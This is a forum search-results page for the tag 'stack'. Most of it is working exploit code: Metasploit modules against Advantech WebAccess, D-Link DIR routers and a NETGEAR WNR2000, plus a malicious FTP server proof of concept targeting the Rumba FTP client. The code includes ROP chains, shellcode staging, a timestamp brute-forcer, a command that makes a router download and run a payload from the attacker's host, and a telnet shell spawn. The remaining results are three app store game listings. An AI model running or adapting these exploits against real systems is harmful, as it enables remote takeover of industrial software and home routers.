
Search the forums

Showing results for the tag 'stack'.




7 results found

  1. Metasploit exploit module (Ruby):

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
      Rank = GoodRanking

      include Msf::Exploit::Remote::DCERPC
      include Msf::Exploit::Egghunter

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow',
          'Description'    => %q{
            This module exploits a stack buffer overflow in Advantech WebAccess 8.2.
            By sending a specially crafted DCERPC request, an attacker could overflow
            the buffer and execute arbitrary code.
          },
          'Author'         => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'ZDI', '17-938' ],
              [ 'CVE', '2017-14016' ],
              [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ]
            ],
          'Privileged'     => true,
          'DefaultOptions' =>
            {
              'EXITFUNC' => 'thread',
            },
          'Payload'        =>
            {
              'Space'    => 2048,
              'BadChars' => "\x00",
            },
          'Platform'       => 'win',
          'Targets'        =>
            [
              [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31',
                {
                  'Ret'   => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14
                  'Slide' => 0x07048f5b, # retn
                  'Jmp'   => 0x0706067e  # pop ecx; pop ecx; ret 0x04
                }
              ],
            ],
          'DisclosureDate' => 'Nov 02 2017',
          'DefaultTarget'  => 0))

        register_options([ Opt::RPORT(4592) ])
      end

      def create_rop_chain()
        # this target opts into dep
        rop_gadgets = [
          0x020214c6, # POP EAX # RETN [BwKrlAPI.dll]
          0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll]
          0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll]
          0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll]
          0x0201a646, # POP EBP # RETN [BwKrlAPI.dll]
          0x07024822, # & push esp # ret [BwPAlarm.dll]
          0x070442dd, # POP EAX # RETN [BwPAlarm.dll]
          0xffffffff, # Value to negate, will become 0x00000001
          0x070467d2, # NEG EAX # RETN [BwPAlarm.dll]
          0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll]
          rand_text_alpha(4).unpack('V'),
          rand_text_alpha(4).unpack('V'),
          rand_text_alpha(4).unpack('V'),
          0x02030af7, # POP EAX # RETN [BwKrlAPI.dll]
          0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx)
          0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll]
          0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll]
          0x07078df5, # POP EAX # RETN [BwPAlarm.dll]
          0xffffffc0, # Value to negate, will become 0x00000040
          0x070467d2, # NEG EAX # RETN [BwPAlarm.dll]
          0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll]
          0x0706fe66, # POP EDI # RETN [BwPAlarm.dll]
          rand_text_alpha(4).unpack('V'),
          rand_text_alpha(4).unpack('V'),
          0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll]
          0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll]
          0x90909090, # nop
          0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll]
        ].flatten.pack("V*")
        return rop_gadgets
      end

      def exploit
        connect
        handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
        print_status("Binding to #{handle} ...")
        dcerpc_bind(handle)
        print_status("Bound to #{handle} ...")

        # send the request to get the handle
        resp = dcerpc.call(0x4, [0x02000000].pack('V'))
        handle = resp.last(4).unpack('V').first
        print_good("Got a handle: 0x%08x" % handle)

        egg_options = { :eggtag => "0day" }
        egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options)

        # apparently this is called a ret chain
        overflow  = [target['Slide']].pack('V')
        overflow << [target['Slide']].pack('V')
        overflow << [target['Slide']].pack('V')
        overflow << [target['Slide']].pack('V')
        overflow << [target['Slide']].pack('V')
        overflow << [target['Slide']].pack('V')
        overflow << [target['Jmp']].pack('V')
        overflow << [target['Ret']].pack('V')
        overflow << [target['Slide']].pack('V')
        overflow << [target['Slide']].pack('V')
        overflow << [target['Slide']].pack('V')
        overflow << [target['Slide']].pack('V')
        overflow << [target['Slide']].pack('V')
        overflow << [target['Slide']].pack('V')
        overflow << create_rop_chain()
        overflow << egghunter
        overflow << egg
        overflow << rand_text_alpha(0x1000 - overflow.length)

        # sorry but I dont like msf's ndr class.
        sploit  = [handle].pack('V')
        sploit << [0x000138bd].pack('V') # opcode we are attacking
        sploit << [0x00001000].pack('V') # size to copy
        sploit << [0x00001000].pack('V') # size of string
        sploit << overflow

        print_status("Trying target #{target.name}...")
        begin
          dcerpc_call(0x1, sploit)
        rescue Rex::Proto::DCERPC::Exceptions::NoResponse
        ensure
          disconnect
        end
        handler
      end
    end
  2. Soft-Apple

    AA Free 3D: Stack The Stickman dots game on the App Store
  3. Hacking

    # Exploit Title: Rumba FTP 4.x Client Stackoverflow SEH
    # Date: 29-10-2016
    # Exploit Author: Umit Aksu
    # Vendor Homepage: http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28731.rumba-ftp-4-x-security-update.aspx
    # Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40307
    # Version: 4.x
    # Tested on: Windows 7
    # CVE : CVE-2016-5764

    1. Description

    Micro Focus Rumba FTP Client 4.x cannot handle long directory names. An attacker can set up a malicious FTP server that sends a long directory name, which can lead to remote code execution on the connected client.

    2. Proof of Concept

    The code below can be used to set up a malicious FTP server that will send a long directory name and overwrite the stack. The PoC only overwrites the SEH + NSEH.

    3. PoC Code

    ------------------- Server.py --------------------------

    # Python 2 PoC server
    import socket
    import sys
    import time

    # IP Address
    IP = '127.0.0.1'

    # Create a TCP/IP socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    # Bind the socket to the port
    server_address = (IP, 21)
    print "Starting up on %s port %s" % server_address
    sock.bind(server_address)

    # Listen for incoming connections
    sock.listen(1)

    # Wait for incoming connection
    while True:
        print "Waiting for a connection"
        connection, client_address = sock.accept()
        try:
            print "Connection from " + str(client_address)
            # Receive the data in small chunks and retransmit it
            connection.send("220 Welcome\r\n")
            while True:
                data = connection.recv(16)
                print "received %s" % data
                if "USER" in data:
                    print "Sending 331"
                    connection.send("331 Please specify the password.\r\n")
                if "PASS" in data:
                    print "Sending 230"
                    connection.send("230 Login successful.\n\n")
                if "PWD" in data:
                    print "Sending 257"
                    # 77A632E2 add esp,908 pop pop pop ret
                    # THIS IS THE PART WHERE THE OVERFLOW HAPPENS
                    connection.send("257 \"/" + "A" * 629 + "\x45\x45\x45\x45" + "\x44\x44\x44\x44" +
                                    "D" * 185 + "rrrr" + "D" * 211 + "\"\r\n")
                if "TYPE A" in data:
                    print "Sending 200 Switching to ASCII mode."
                    connection.send("200 Switching to ASCII mode.\r\n")
                if "TYPE I" in data:
                    print "Sending 200 Switching to Binary mode."
                    connection.send("200 Switching to Binary mode.\r\n")
                if "SYST" in data:
                    print "Sending 215"
                    connection.send("215 UNIX Type: L8\r\n")
                if "SIZE" in data:
                    print "Sending 200"
                    connection.send("200 Switching to Binary mode. \r\n")
                if "FEAT" in data:
                    print "Sending 211-Features"
                    connection.send("211-Features:\r\n EPRT\r\n EPSV\r\n MDTM\r\n PASV\r\n REST STREAM\r\n SIZE\r\n TVFS\r\n211 End\r\n")
                if "CWD" in data:
                    print "Sending 250 Directory successfully changed."
                    connection.send("250 Directory successfully changed.\r\n")
                if "PASV" in str(data):
                    print "Sending 227 Entering Passive Mode (130,161,45,252,111,183)\n\n"
                    connection.send("227 Entering Passive Mode (130,161,45,252,111,183)\n\n")
                    # Listen on new socket for connection
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    print 'Socket created'
                    # Bind socket to local host and port
                    try:
                        s.bind((IP, 28599))
                    except socket.error as msg:
                        print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
                        sys.exit()
                    print 'Socket bind complete for PASV on port 28599'
                    # Start listening on socket
                    s.listen(10)
                    print 'Socket now listening on 28599'
                    # now keep talking with the client
                    # wait to accept a connection - blocking call
                    conn, addr = s.accept()
                    print 'Connected with ' + addr[0] + ':' + str(addr[1])
                    time.sleep(1)
                    print "Sending dir list"
                    connection.send("150 Here comes the directory listing.\r\n")
                    conn.send("d" * 500 + "rwx------ 2 500 500 4096 Nov 05 2007 " + "A." + "B" * 500 + "\r\n")
                    # Send ok to ftp client
                    connection.send("226 Directory send OK.\r\n")
                    # close the connection
                    s.close()
                    conn.close()
                    break
                if "EXIT" in str(data):
                    print "REC"
                    connection.send("Have a nice day!\r\n")
                    break
        finally:
            connection.close()
  4. Metasploit exploit module (Ruby):

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'

    # Payload working status:
    # MIPS:
    #   - all valid payloads working (the ones that we are able to send without null bytes)
    # ARM:
    #   - inline rev/bind shell works (bind... meh sometimes)
    #   - stager rev/bind shell FAIL
    #   - mettle rev/bind fails with sigsegv standalone, but works under strace or gdb...

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::Remote::HttpServer
      include Msf::Exploit::EXE
      include Msf::Exploit::FileDropper

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow',
          'Description'    => %q{
            Several Dlink routers contain a pre-authentication stack buffer overflow vulnerability,
            which is exposed on the LAN interface on port 80. This vulnerability affects the HNAP
            SOAP protocol, which accepts arbitrarily long strings into certain XML parameters and
            then copies them into the stack.
            This exploit has been tested on the real devices DIR-818LW and 868L (rev. B), and it
            was tested using emulation on the DIR-822, 823, 880, 885, 890 and 895. Others might be
            affected, and this vulnerability is present in both MIPS and ARM devices.
            The MIPS devices are powered by Lextra RLX processors, which are crippled MIPS cores
            lacking a few load and store instructions. Because of this the payloads have to be
            sent unencoded, which can cause them to fail, although the bind shell seems to work well.
            For the ARM devices, the inline reverse tcp seems to work best.
            Check the reference links to see the vulnerable firmware versions.
          },
          'Author'         =>
            [
              'Pedro Ribeiro <[email protected]>' # Vulnerability discovery and Metasploit module
            ],
          'License'        => MSF_LICENSE,
          'Platform'       => ['linux'],
          'References'     =>
            [
              ['CVE', '2016-6563'],
              ['US-CERT-VU', '677427'],
              ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt'],
              ['URL', 'http://seclists.org/fulldisclosure/2016/Nov/38']
            ],
          'DefaultOptions' => { 'WfsDelay' => 10 },
          'Stance'         => Msf::Exploit::Stance::Aggressive, # we need this to run in the foreground (ARM target)
          'Targets'        =>
            [
              [ 'Dlink DIR-818 / 822 / 823 / 850 [MIPS]',
                {
                  'Offset'         => 3072,
                  'LibcBase'       => 0x2aabe000,          # should be the same offset for all firmware versions and all routers
                  'Sleep'          => 0x56DF0,             # sleep() offset into libuClibc-0.9.30.3.so
                  'FirstGadget'    => 0x4EA1C,             # see comments below for gadget information
                  'SecondGadget'   => 0x2468C,
                  'ThirdGadget'    => 0x41f3c,
                  'PrepShellcode1' => "\x23\xbd\xf3\xc8",  # addi sp,sp,-3128
                  'PrepShellcode2' => "\x03\xa0\xf8\x09",  # jalr sp
                  'BranchDelay'    => "\x20\x84\xf8\x30",  # addi a0,a0,-2000 (nop)
                  'Arch'           => ARCH_MIPSBE,
                  'Payload'        =>
                    {
                      'BadChars'    => "\x00",
                      'EncoderType' => Msf::Encoder::Type::Raw # else it will fail with SIGILL, this CPU is crippled
                    },
                }
              ],
              [ 'Dlink DIR-868 (rev. B and C) / 880 / 885 / 890 / 895 [ARM]',
                {
                  'Offset'       => 1024,
                  'LibcBase'     => 0x400DA000, # we can pick any xyz in 0x40xyz000 (an x of 0/1 works well)
                  'System'       => 0x5A270,    # system() offset into libuClibc-0.9.32.1.so
                  'FirstGadget'  => 0x18298,    # see comments below for gadget information
                  'SecondGadget' => 0x40CB8,
                  'Arch'         => ARCH_ARMLE,
                }
              ],
            ],
          'DisclosureDate' => 'Nov 7 2016',
          'DefaultTarget'  => 0))
        register_options(
          [
            Opt::RPORT(80),
            OptString.new('SLEEP', [true, 'Seconds to sleep between requests (ARM only)', '0.5']),
            OptString.new('SRVHOST', [true, 'IP address for the HTTP server (ARM only)', '0.0.0.0']),
            OptString.new('SRVPORT', [true, 'Port for the HTTP server (ARM only)', '3333']),
            OptString.new('SHELL', [true, 'Don\'t change this', '/bin/sh']),
            OptString.new('SHELLARG', [true, 'Don\'t change this', 'sh']),
          ], self.class)
      end

      def check
        begin
          res = send_request_cgi({
            'uri'          => '/HNAP1/',
            'method'       => 'POST',
            'Content-Type' => 'text/xml',
            'headers'      => { 'SOAPAction' => 'http://purenetworks.com/HNAP1/Login' }
          })
          if res && res.code == 500
            return Exploit::CheckCode::Detected
          end
        rescue ::Rex::ConnectionError
          return Exploit::CheckCode::Unknown
        end
        Exploit::CheckCode::Safe
      end

      def calc_encode_addr (offset, big_endian = true)
        if big_endian
          [(target['LibcBase'] + offset).to_s(16)].pack('H*')
        else
          [(target['LibcBase'] + offset).to_s(16)].pack('H*').reverse
        end
      end

      def prepare_shellcode_arm (cmd)
        #All these gadgets are from /lib/libuClibc-0.9.32.1.so, which is the library used for all versions of firmware for all ARM routers
        #first_gadget (pops system() address into r3, and second_gadget into PC):
        #.text:00018298                 LDMFD   SP!, {R3,PC}
        #second_gadget (puts the stack pointer into r0 and calls system() at r3):
        #.text:00040CB8                 MOV     R0, SP
        #.text:00040CBC                 BLX     R3
        #system() (Executes argument in r0 (our stack pointer)
        #.text:0005A270 system
        #The final payload will be:
        #'a' * 1024 + 0xffffffff + 'b' * 16 + 'AAAA' + first_gadget + system() + second_gadget + command
        shellcode =
          rand_text_alpha(target['Offset']) +                # filler
          "\xff\xff\xff\xff" +                               # n integer overwrite (see advisory)
          rand_text_alpha(16) +                              # moar filler
          rand_text_alpha(4) +                               # r11
          calc_encode_addr(target['FirstGadget'], false) +   # first_gadget
          calc_encode_addr(target['System'], false) +        # system() address
          calc_encode_addr(target['SecondGadget'], false) +  # second_gadget
          cmd                                                # our command
      end

      def prepare_shellcode_mips
        #All these gadgets are from /lib/libuClibc-0.9.30.3.so, which is the library used for all versions of firmware for all MIPS routers
        #<sleep> is at 56DF0
        #first gadget - execute sleep and call second_gadget
        #.text:0004EA1C                 move    $t9, $s0              <- sleep()
        #.text:0004EA20                 lw      $ra, 0x20+var_4($sp)  <- second_gadget
        #.text:0004EA24                 li      $a0, 2                <- arg for sleep()
        #.text:0004EA28                 lw      $s0, 0x20+var_8($sp)
        #.text:0004EA2C                 li      $a1, 1
        #.text:0004EA30                 move    $a2, $zero
        #.text:0004EA34                 jr      $t9
        #.text:0004EA38                 addiu   $sp, 0x20
        #second gadget - put stack pointer in a1:
        #.text:0002468C                 addiu   $s1, $sp, 0x58
        #.text:00024690                 li      $s0, 0x44
        #.text:00024694                 move    $a2, $s0
        #.text:00024698                 move    $a1, $s1
        #.text:0002469C                 move    $t9, $s4
        #.text:000246A0                 jalr    $t9
        #.text:000246A4                 move    $a0, $s2
        #third gadget - call $a1 (stack pointer):
        #.text:00041F3C                 move    $t9, $a1
        #.text:00041F40                 move    $a1, $a2
        #.text:00041F44                 addiu   $a0, 8
        #.text:00041F48                 jr      $t9
        #.text:00041F4C                 nop
        #When the crash occurs, the stack pointer is at xml_tag_value[3128]. In order to have a larger space for the shellcode (2000+ bytes), we can jump back to the beginning of the buffer.
        #prep_shellcode_1: 23bdf7a8 addi sp,sp,-3128
        #prep_shellcode_2: 03a0f809 jalr sp
        #branch_delay: 2084f830 addi a0,a0,-2000
        #The final payload will be:
        #shellcode + 'a' * (2064 - shellcode.size) + sleep() + '%31' * 4 + '%32' * 4 + '%33' * 4 + third_gadget + first_gadget + 'b' * 0x1c + second_gadget + 'c' * 0x58 + prep_shellcode_1 + prep_shellcode_2 + branch_delay
        shellcode =
          payload.encoded +                                            # exploit
          rand_text_alpha(target['Offset'] - payload.encoded.length) + # filler
          calc_encode_addr(target['Sleep']) +                          # s0
          rand_text_alpha(4) +                                         # s1
          rand_text_alpha(4) +                                         # s2
          rand_text_alpha(4) +                                         # s3
          calc_encode_addr(target['ThirdGadget']) +                    # s4 (third gadget)
          calc_encode_addr(target['FirstGadget']) +                    # initial pc / ra (first_gadget)
          rand_text_alpha(0x1c) +                                      # filler
          calc_encode_addr(target['SecondGadget']) +                   # second_gadget
          rand_text_alpha(0x58) +                                      # filler
          target['PrepShellcode1'] +                                   # exploit prep
          target['PrepShellcode2'] +                                   # exploit prep
          target['BranchDelay']                                        # exploit prep
      end

      def send_payload (payload)
        begin
          # the payload can go in the Action, Username, LoginPassword or Captcha XML tag
          body = %{
    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
    <Login xmlns="http://purenetworks.com/HNAP1/">
    <Action>something</Action>
    <Username>Admin</Username>
    <LoginPassword></LoginPassword>
    <Captcha>#{payload}</Captcha>
    </Login>
    </soap:Body>
    </soap:Envelope>
    }
          res = send_request_cgi({
            'uri'     => '/HNAP1/',
            'method'  => 'POST',
            'ctype'   => 'text/xml',
            'headers' => { 'SOAPAction' => 'http://purenetworks.com/HNAP1/Login' },
            'data'    => body
          })
        rescue ::Rex::ConnectionError
          fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
        end
      end

      # Handle incoming requests from the server
      def on_request_uri(cli, request)
        #print_status("on_request_uri called: #{request.inspect}")
        if (not @pl)
          print_error("#{peer} - A request came in, but the payload wasn't ready yet!")
          return
        end
        print_status("#{peer} - Sending the payload to the device...")
        @elf_sent = true
        send_response(cli, @pl)
      end

      def exploit
        print_status("#{peer} - Attempting to exploit #{target.name}")
        if target == targets[0]
          send_payload(prepare_shellcode_mips)
        else
          downfile = rand_text_alpha(8 + rand(8))
          @pl = generate_payload_exe
          @elf_sent = false

          resource_uri = '/' + downfile

          #do not use SSL
          if datastore['SSL']
            ssl_restore = true
            datastore['SSL'] = false
          end

          if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
            srv_host = Rex::Socket.source_address(rhost)
          else
            srv_host = datastore['SRVHOST']
          end

          service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
          print_status("#{peer} - Starting up our web service on #{service_url} ...")
          start_service({'Uri' => {
            'Proc' => Proc.new { |cli, req|
              on_request_uri(cli, req)
            },
            'Path' => resource_uri
          }})

          datastore['SSL'] = true if ssl_restore

          print_status("#{peer} - Asking the device to download and execute #{service_url}")
          filename = rand_text_alpha_lower(rand(8) + 2)
          cmd = "wget #{service_url} -O /tmp/#{filename}; chmod +x /tmp/#{filename}; /tmp/#{filename} &"
          shellcode = prepare_shellcode_arm(cmd)

          print_status("#{peer} - \"Bypassing\" the device's ASLR. This might take up to 15 minutes.")
          counter = 0.00
          while (not @elf_sent)
            if counter % 50.00 == 0 && counter != 0.00
              print_status("#{peer} - Tried #{counter.to_i} times in #{(counter * datastore['SLEEP'].to_f).to_i} seconds.")
            end
            send_payload(shellcode)
            sleep datastore['SLEEP'].to_f # we need to be in the LAN, so a low value (< 1s) is fine
            counter += 1
          end
          print_status("#{peer} - The device downloaded the payload after #{counter.to_i} tries / #{(counter * datastore['SLEEP'].to_f).to_i} seconds.")
        end
      end
    end
  5. Metasploit exploit module (Ruby):

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'
    require 'time'

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Auxiliary::CRand

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow',
          'Description'    => %q{
            The NETGEAR WNR2000 router has a buffer overflow vulnerability in the hidden_lang_avi
            parameter. In order to exploit it, it is necessary to guess the value of a certain timestamp
            which is in the configuration of the router. An authenticated attacker can simply fetch
            this from a page, but an unauthenticated attacker has to brute force it.
            Bruteforcing the timestamp token might take a few minutes, a few hours, or days, but it is
            guaranteed that it can be bruteforced.
            This module implements both modes, and it works very reliably. It has been tested with the
            WNR2000v5, firmware versions 1.0.0.34 and 1.0.0.18. It should also work with hardware
            revisions v4 and v3, but this has not been tested - with these routers it might be
            necessary to adjust the LibcBase variable as well as the gadget addresses.
          },
          'Author'         =>
            [
              'Pedro Ribeiro <[email protected]>' # Vulnerability discovery and Metasploit module
            ],
          'License'        => MSF_LICENSE,
          'Platform'       => ['unix'],
          'References'     =>
            [
              ['CVE', '2016-10174'],
              ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt'],
              ['URL', 'http://seclists.org/fulldisclosure/2016/Dec/72'],
              ['URL', 'http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability']
            ],
          'Targets'        =>
            [
              [ 'NETGEAR WNR2000v5',
                {
                  'LibcBase'     => 0x2ab24000, # should be the same offset for all firmware versions (in libuClibc-0.9.30.1.so)
                  'SystemOffset' => 0x547D0,
                  'GadgetOffset' => 0x2462C,
                  #The ROP gadget will load $sp into $a0 (which will contain the system() command) and call $s0 (which will contain the address of system()):
                  #LOAD:0002462C                 addiu   $a0, $sp, 0x40+arg_0
                  #LOAD:00024630                 move    $t9, $s0
                  #LOAD:00024634                 jalr    $t9
                  'Payload'      =>
                    {
                      'BadChars' => "\x00\x25\x26",
                      'Compat'   =>
                        {
                          'PayloadType'    => 'cmd_interact',
                          'ConnectionType' => 'find',
                        },
                    },
                }
              ],
            ],
          'Privileged'     => true,
          'Arch'           => ARCH_CMD,
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
          'DisclosureDate' => 'Dec 20 2016',
          'DefaultTarget'  => 0))
        register_options(
          [
            Opt::RPORT(80),
            OptString.new('HttpUsername', [true, 'Username for the web interface (not needed but exploitation is faster)', 'admin']),
            OptString.new('HttpPassword', [true, 'Password for the web interface (not needed but exploitation is faster)', 'password']),
          ], self.class)
        register_advanced_options(
          [
            OptInt.new('TIME_OFFSET', [true, 'Maximum time differential to try', 5000]),
            OptInt.new('TIME_SURPLUS', [true, 'Increase this if you are sure the device is vulnerable and you are not getting a shell', 200])
          ], self.class)
      end

      def check
        res = send_request_cgi({
          'uri'    => '/',
          'method' => 'GET'
        })
        if res && res.headers['WWW-Authenticate']
          auth = res.headers['WWW-Authenticate']
          if auth =~ /WNR2000v5/
            return Exploit::CheckCode::Detected
          elsif auth =~ /WNR2000v4/ || auth =~ /WNR2000v3/
            return Exploit::CheckCode::Unknown
          end
        end
        Exploit::CheckCode::Safe
      end

      def uri_encode (str)
        "%" + str.scan(/.{2}|.+/).join("%")
      end

      def calc_address (libc_base, offset)
        addr = (libc_base + offset).to_s(16)
        uri_encode(addr)
      end

      def get_current_time
        res = send_request_cgi({
          'uri'    => '/',
          'method' => 'GET'
        })
        if res && res['Date']
          date = res['Date']
          return Time.parse(date).strftime('%s').to_i
        end
      end

      def get_auth_timestamp
        res = send_request_raw({
          'uri'    => '/lang_check.html',
          'method' => 'GET',
          # automatically uses HttpPassword and HttpUsername to authenticate
        })
        if res && res.code == 401
          # try again, might fail the first time
          res = send_request_raw({
            'uri'    => '/lang_check.html',
            'method' => 'GET',
            # automatically uses HttpPassword and HttpUsername to authenticate
          })
        end
        if res && res.code == 200
          if res.body =~ /timestamp=([0-9]{8})/
            $1.to_i
          end
        end
      end

      # Do some crazyness to force Ruby to cast to a single-precision float and
      # back to an integer.
      # This emulates the behaviour of the soft-fp library and the float cast
      # which is done at the end of Netgear's timestamp generator.
      def ieee754_round (number)
        [number].pack('f').unpack('f*')[0].to_i
      end

      # This is the actual algorithm used in the get_timestamp function in
      # the Netgear firmware.
      def get_timestamp(time)
        srandom_r time
        t0 = random_r
        t1 = 0x17dc65df;
        hi = (t0 * t1) >> 32;
        t2 = t0 >> 31;
        t3 = hi >> 23;
        t3 = t3 - t2;
        t4 = t3 * 0x55d4a80;
        t0 = t0 - t4;
        t0 = t0 + 0x989680;
        ieee754_round(t0)
      end

      def get_payload
        rand_text_alpha(36) +                                        # filler_1
        calc_address(target['LibcBase'], target['SystemOffset']) +   # s0
        rand_text_alpha(12) +                                        # s1, s2 and s3
        calc_address(target['LibcBase'], target['GadgetOffset']) +   # gadget
        rand_text_alpha(0x40) +                                      # filler_2
        "killall telnetenable; killall utelnetd; /usr/sbin/utelnetd -d -l /bin/sh" # payload
      end

      def send_req(timestamp)
        begin
          uri_str = (timestamp == nil ? \
            "/apply_noauth.cgi?/lang_check.html" : \
            "/apply_noauth.cgi?/lang_check.html%20timestamp=#{timestamp.to_s}")
          res = send_request_raw({
            'uri'     => uri_str,
            'method'  => 'POST',
            'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
            'data'    => "submit_flag=select_language&hidden_lang_avi=#{get_payload}"
          })
        rescue ::Errno::ETIMEDOUT, ::Errno::ECONNRESET, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
          return
        end
      end

      def exploit
        # 1: try to see if the default admin username and password are set
        timestamp = get_auth_timestamp

        # 2: now we try two things at once:
        # one, if the timestamp is not nil then we got an authenticated timestamp, let's try that
        # two, if the timestamp is nil, then let's try without timestamp first (the timestamp only gets set if the user visited the page before)
        print_status("#{peer} - Trying the easy way out first")
        send_req(timestamp)
        begin
          ctx = { 'Msf' => framework, 'MsfExploit' => self }
          sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 })
          if not sock.nil?
            print_good("#{peer} - Success, shell incoming!")
            return handler(sock)
          end
        rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
          sock.close if sock
        end

        print_bad("#{peer} - Well that didn't work... let's do it the hard way.")

        # no shell? let's just go on and bruteforce the timestamp
        # 3: get the current date from the router and parse it
        end_time = get_current_time
        if end_time.nil?
          fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time")
        end

        if end_time <= datastore['TIME_OFFSET']
          start_time = 0
        else
          start_time = end_time - datastore['TIME_OFFSET']
        end
        end_time += datastore['TIME_SURPLUS']

        if end_time < (datastore['TIME_SURPLUS'] * 7.5).to_i
          end_time = (datastore['TIME_SURPLUS'] * 7.5).to_i
        end

        print_good("#{peer} - Got time #{end_time} from router, starting exploitation attempt.")
        print_status("#{peer} - Be patient, this might take a long time (typically a few minutes, but it might take hours).")

        # 2: work back from the current router time minus datastore['TIME_OFFSET']
        while true
          for time in end_time.downto(start_time)
            timestamp = get_timestamp(time)
            sleep 0.1
            if time % 400 == 0
              print_status("#{peer} - Still working, trying time #{time}")
            end
            send_req(timestamp)
            begin
              ctx = { 'Msf' => framework, 'MsfExploit' => self }
              sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 })
              if sock.nil?
                next
              end
              print_status("#{peer} - Success, shell incoming!")
              return handler(sock)
            rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
              sock.close if sock
              next
            end
          end

          end_time = start_time
          start_time -= datastore['TIME_OFFSET']
          if start_time < 0
            if end_time <= datastore['TIME_OFFSET']
              fail_with(Failure::Unknown, "#{peer} - Exploit failed.")
            end
            start_time = 0
          end
          print_status("#{peer} - Going for another round, finishing at #{start_time} and starting at #{end_time}")
          # let the router clear the buffers a bit...
          sleep 30
        end
      end
    end
  6. Soft-Android

    Stack Stack game – Android apps on Google Play
  7. Soft-Apple

    Stack Stack game on the App Store